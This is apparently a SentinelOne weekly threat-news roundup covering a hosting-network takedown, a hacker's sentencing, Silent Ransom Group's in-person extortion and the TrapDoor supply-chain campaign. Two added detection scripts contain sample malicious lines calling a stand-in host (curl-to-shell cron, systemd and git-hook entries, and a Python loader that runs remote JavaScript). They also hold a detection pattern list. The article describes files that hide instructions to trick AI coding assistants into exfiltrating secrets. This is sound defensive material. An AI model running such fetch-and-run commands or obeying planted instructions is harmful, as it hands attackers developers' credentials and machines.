The Good | Authorities Dismantle Malicious Hosting Network & Sentence Oregon State Cyberattacker
Web hosting firm, Stark Industries, was the subject of scrutiny this week from financial crime investigators in the Netherlands (FIOD). Founded just before the 2022 invasion of Ukraine, the firm had deep ties to Russian and Belarusian entities all sanctioned by the EU. Dutch authorities arrested two individuals and seized 800 servers across multiple data centers that actively enabled Russian-based cyberattacks, disinformation operations, and widespread interference campaigns.

After being sanctioned in May of last year, Stark Industries shifted their operations to a front company named WorkTitans B.V., which provided hosting services under a new brand, THE.Hosting. This entity allegedly supported the pro-Russian hacktivist syndicate NoName057(16) in executing distributed denial-of-service (DDoS) attacks and indirectly supplied economic resources to restricted organizations.
Collaboration between the DoJ and Romanian law enforcement has resulted in a Romanian national receiving a sentence of 56 months in federal prison for breaching an Oregon state government network.
Catalin Dragomir, operating under the alias “inthematrixl,” pled guilty to aggravated identity theft and obtaining information from a protected computer. Court documents reveal that the 46-year-old gained unauthorized access to the Oregon Department of Emergency Management in June 2021. He subsequently sold this network access to an outside buyer, providing stolen personally identifiable information.
Beyond the Oregon breach, Dragomir also compromised nearly a dozen other victims across the U.S., with total losses exceeding $250,000. Dragomir currently faces five years for computer intrusion, a mandatory two-year term for identity theft, and three years under supervised release. The court has additionally ordered the forfeiture of his cryptocurrency assets.
The Bad | Silent Ransom Group Attackers Dispatch Operatives for In-Person Data Extortion
In-person data theft schemes are on the rise again. In an urgent flash report, the FBI warns that Silent Ransom Group (SRG) is executing social engineering operations against U.S. legal and financial institutions directly at the site of the victim.
Splitting from the Conti syndicate in early 2022, SRG (aka UNC3753, Luna Moth, and Chatty Spider) has historically relied on targeted callback phishing. Lately, the group has escalated its tactics beyond network compromises to include unauthorized physical access.
The attack chain begins with the threat actors posing as internal IT support personnel. Using typosquatted helpdesk domains, the attackers deploy phishing emails or phone calls urging employees to contact them for technical assistance.
Once an employee engages, the attackers attempt to establish a remote desktop session to exfiltrate data. If remote access fails, SRG deliberately escalates the intrusion by sending an operative directly to the victim’s physical location. These unidentified individuals attempt to gain building access to manually insert USB flash drives or external hard drives into the targeted company computers.
Once the data is in hand, the gang extorts the victimized legal and financial organizations. The attackers send ransom demands threatening to publish the stolen proprietary data on leak sites, while simultaneously harassing both employees and external clients by phone to force financial negotiations.
This recent escalation builds upon previous advisories, making it critical for organizations to train staff on how to thoroughly verify digital helpdesk requests and immediately report threats to physical security.
The Ugly | TrapDoor Campaign Launches Cross-Ecosystem Supply Chain Attacks to Steal Credentials
Security researchers have uncovered TrapDoor, a coordinated software supply chain campaign actively distributing credential-stealing malware across npm, PyPI, and Crates.io.
Starting on May 22, 2026, threat actors deployed over 34 malicious packages spanning nearly 400 versions to specifically target developers within the cryptocurrency, decentralized finance, Solana, and AI communities.
Disguised as legitimate local environment and security tooling, TrapDoor works by harvesting a wide range of sensitive developer secrets, SSH keys, cloud credentials, and cryptocurrency wallets.
The operation uses tailored execution methods for each specific registry. Within npm environments, malicious postinstall hooks deploy a shared JavaScript payload that actively validates stolen AWS and GitHub tokens while attempting SSH-based lateral movement.
Rust crates similarly leverage malicious build scripts to search local keystores, obfuscating discovered data with a hardcoded XOR key (trivially reversible, so not real encryption) before exfiltrating it to GitHub Gists.
Meanwhile, the Python packages auto-execute during import to download and run remote JavaScript payloads from attacker-controlled domains, granting the operators significant flexibility to modify the malware’s behavior without publishing new registry releases.
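The three execution vectors above (npm lifecycle scripts, Cargo build scripts, and Python code that runs at import) can be enumerated from a checkout before anything is installed. The script below is an added example written for this page, not code from SentinelOne or the TrapDoor researchers; the package names (`solana-env-check`, `keystore-audit`, `localsec_tools`, `plain-util`) and the directory tree it builds are constructed fixtures, not real packages, and the suspicious-call regex is a heuristic rather than a complete list.

```python
"""Scan a checkout for dependency code that runs at install or import time.

Added example, not SentinelOne's or the TrapDoor researchers' code. It looks
for the three execution vectors described above: npm lifecycle scripts,
Cargo build scripts, and module-level statements in a Python package's
__init__.py that fetch or execute something. The package names and the
sample tree it builds are constructed fixtures, not real packages.
"""
import ast
import json
import re
import tempfile
from pathlib import Path

NPM_LIFECYCLE = ("preinstall", "install", "postinstall", "prepare")
# Module-level Python that reaches the network, spawns a process or decodes
# a blob is worth a look; definitions alone do nothing on import. Heuristic only.
PY_SUSPECT = re.compile(
    r"(urlopen|requests\.(get|post)|subprocess\.|os\.system|\bexec\(|\beval\(|b64decode)"
)


def scan_npm(pkg_json: Path) -> list:
    """npm runs these lifecycle scripts automatically during `npm install`."""
    try:
        data = json.loads(pkg_json.read_text())
    except (ValueError, OSError):
        return []
    scripts = data.get("scripts") or {}
    return [
        {"ecosystem": "npm", "package": data.get("name", "?"),
         "vector": f"scripts.{hook}", "detail": cmd}
        for hook, cmd in scripts.items() if hook in NPM_LIFECYCLE
    ]


def scan_cargo(cargo_toml: Path) -> list:
    """Cargo compiles and runs build.rs (or the file named by `build = ...`) at build time."""
    text = cargo_toml.read_text(errors="replace")
    crate_dir = cargo_toml.parent
    if not ((crate_dir / "build.rs").exists() or re.search(r"^\s*build\s*=", text, re.M)):
        return []
    name = re.search(r'^\s*name\s*=\s*"([^"]+)"', text, re.M)
    return [{"ecosystem": "crates.io", "package": name.group(1) if name else "?",
             "vector": "build.rs", "detail": str(crate_dir / "build.rs")}]


def scan_python(init_py: Path) -> list:
    """Only statements at module level execute on import; defs and imports are skipped."""
    source = init_py.read_text(errors="replace")
    try:
        tree = ast.parse(source)
    except SyntaxError:
        return []
    findings = []
    for node in tree.body:
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef,
                             ast.Import, ast.ImportFrom)):
            continue
        segment = ast.get_source_segment(source, node) or ""
        if PY_SUSPECT.search(segment):
            findings.append({"ecosystem": "PyPI", "package": init_py.parent.name,
                             "vector": f"__init__.py:{node.lineno}", "detail": segment.strip()})
    return findings


def scan_tree(root) -> list:
    """Walk root and collect install-/import-time execution vectors."""
    findings = []
    for path in Path(root).rglob("*"):
        if path.name == "package.json":
            findings += scan_npm(path)
        elif path.name == "Cargo.toml":
            findings += scan_cargo(path)
        elif path.name == "__init__.py":
            findings += scan_python(path)
    return findings


def build_sample_tree(base) -> Path:
    """Constructed fixtures so the scanner runs offline; none of these are real packages."""
    base = Path(base)
    hooked = base / "node_modules" / "solana-env-check"            # hypothetical name
    hooked.mkdir(parents=True)
    (hooked / "package.json").write_text(json.dumps({
        "name": "solana-env-check",
        "scripts": {"postinstall": "node lib/setup.js", "test": "jest"}}))
    clean = base / "node_modules" / "plain-util"                    # hypothetical, benign
    clean.mkdir()
    (clean / "package.json").write_text(json.dumps({"name": "plain-util", "scripts": {"test": "jest"}}))
    crate = base / "vendor" / "keystore-audit"                      # hypothetical name
    crate.mkdir(parents=True)
    (crate / "Cargo.toml").write_text('[package]\nname = "keystore-audit"\nversion = "0.2.0"\n')
    (crate / "build.rs").write_text("fn main() { /* would walk ~/.ssh here */ }\n")
    pkg = base / "site-packages" / "localsec_tools"                 # hypothetical name
    pkg.mkdir(parents=True)
    (pkg / "__init__.py").write_text(
        "import subprocess, urllib.request\n"
        "def helper():\n    return 1\n"
        '_js = urllib.request.urlopen("https://example.invalid/loader.js").read()\n'
        '_ = subprocess.run(["node", "-e", _js.decode()])\n')
    return base


def demo() -> list:
    """Build the fixtures in a temp dir and scan them."""
    return scan_tree(build_sample_tree(tempfile.mkdtemp()))


if __name__ == "__main__":
    for f in demo():
        print(f"{f['ecosystem']:<10} {f['package']:<18} {f['vector']:<20} {f['detail']}")
```

Run it against a real checkout with `scan_tree(".")` after `npm ci --ignore-scripts`, `cargo vendor`, or a `pip download` into a scratch directory; a hit is not proof of malice (plenty of legitimate packages have postinstall steps or build.rs), it is the list of code that will run without you asking.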

TrapDoor establishes host persistence utilizing cron jobs, systemd services, and Git hooks. The campaign also targets AI coding assistants by implanting compromised files that contain hidden instructions deliberately designed to trick AI tools into autonomously executing malicious security scans that then discover and exfiltrate local secrets.
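The persistence mechanisms named above leave artefacts that are cheap to audit: a live Git hook, a crontab line, or a systemd `Exec*` directive that fetches code at run time or launches it from a staging directory. The script below is an added example for this page, not code from SentinelOne or the researchers; the `SUSPECT` pattern list is a starting heuristic, and the sample hooks directory, crontab text and unit file are constructed inputs.

```python
"""Hunt for the persistence artefacts named above: Git hooks, cron entries
and systemd units that fetch code at run time or launch it from staging
directories.

Added example, not code from the page or the researchers. The pattern list
and the sample hooks, crontab and unit file are constructed for the demo.
"""
import re
import stat
import tempfile
from pathlib import Path

# Commands a build tool or dependency has no business leaving behind (heuristic).
SUSPECT = re.compile(
    r"(curl |wget |base64 (-d|--decode)|/tmp/|/dev/shm/|python3? -c|node -e|bash -c|sh -c|\bnohup\b)"
)

# Constructed sample inputs, not captured from a real host.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
@reboot /bin/sh -c "$(curl -fsSL https://example.invalid/b)"
*/15 * * * * /tmp/.cache/update.sh
"""

SAMPLE_UNIT = """\
[Unit]
Description=Local security telemetry
[Service]
ExecStart=/bin/sh -c "curl -fsSL https://example.invalid/a | sh"
Restart=always
[Install]
WantedBy=default.target
"""


def audit_git_hooks(repo) -> list:
    """Return (kind, hook name, matched text) for live hooks that look suspicious.
    Stock hooks ship as *.sample and are inert; a real hook must be executable."""
    hooks_dir = Path(repo) / ".git" / "hooks"
    findings = []
    if not hooks_dir.is_dir():
        return findings
    for hook in sorted(hooks_dir.iterdir()):
        if hook.suffix == ".sample" or not hook.is_file():
            continue
        if not hook.stat().st_mode & stat.S_IXUSR:
            continue
        m = SUSPECT.search(hook.read_text(errors="replace"))
        if m:
            findings.append(("git-hook", hook.name, m.group(0)))
    return findings


def audit_crontab(text) -> list:
    """Flag crontab lines (e.g. the output of `crontab -l`) with suspicious commands."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = SUSPECT.search(line)
        if m:
            findings.append(("cron", line, m.group(0)))
    return findings


def audit_systemd_unit(name, text) -> list:
    """Flag Exec* directives (ExecStart, ExecStartPre, ...) in a unit file."""
    findings = []
    for line in text.splitlines():
        key, _, value = line.partition("=")
        if not key.strip().startswith("Exec"):
            continue
        m = SUSPECT.search(value)
        if m:
            findings.append(("systemd", name, m.group(0)))
    return findings


def make_sample_repo(base) -> Path:
    """Constructed .git/hooks: one live malicious hook, one benign live hook,
    and one inert .sample that would be a false positive if not skipped."""
    hooks = Path(base) / ".git" / "hooks"
    hooks.mkdir(parents=True)
    (hooks / "pre-commit").write_text("#!/bin/sh\ncurl -fsSL https://example.invalid/p | sh\n")
    (hooks / "pre-commit").chmod(0o755)
    (hooks / "commit-msg").write_text("#!/bin/sh\nexit 0\n")
    (hooks / "commit-msg").chmod(0o755)
    (hooks / "post-merge.sample").write_text("#!/bin/sh\ncurl https://example.invalid/x\n")
    return Path(base)


def demo() -> dict:
    """Run all three audits over the constructed samples."""
    repo = make_sample_repo(tempfile.mkdtemp())
    return {"git": audit_git_hooks(repo),
            "cron": audit_crontab(SAMPLE_CRONTAB),
            "systemd": audit_systemd_unit("telemetry.service", SAMPLE_UNIT)}


if __name__ == "__main__":
    for kind, hits in demo().items():
        for hit in hits:
            print(kind, hit)
```

On a real developer workstation, point `audit_git_hooks` at each checkout (and at `core.hooksPath` if it is set), feed `crontab -l` output and the files under `~/.config/systemd/user/` and `/etc/systemd/system/` to the other two functions, and compare against a known-good baseline rather than treating every hit as malicious.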
Researchers say that threat actors are now actively submitting pull requests containing these poisoned files to major open-source AI projects, an evolving tactic to compromise developer workflows through automated contributor processes and code integrations.
Researchers emphasize that this campaign combines traditional package typosquatting with emerging developer-environment attack vectors. By carefully tailoring package names to mimic legitimate cryptocurrency, AI, and local security workflows, the attackers successfully bypass initial developer scrutiny to execute their multi-ecosystem infiltration. A list of compromised packages can be found here.
from SentinelOne https://ift.tt/VnATQma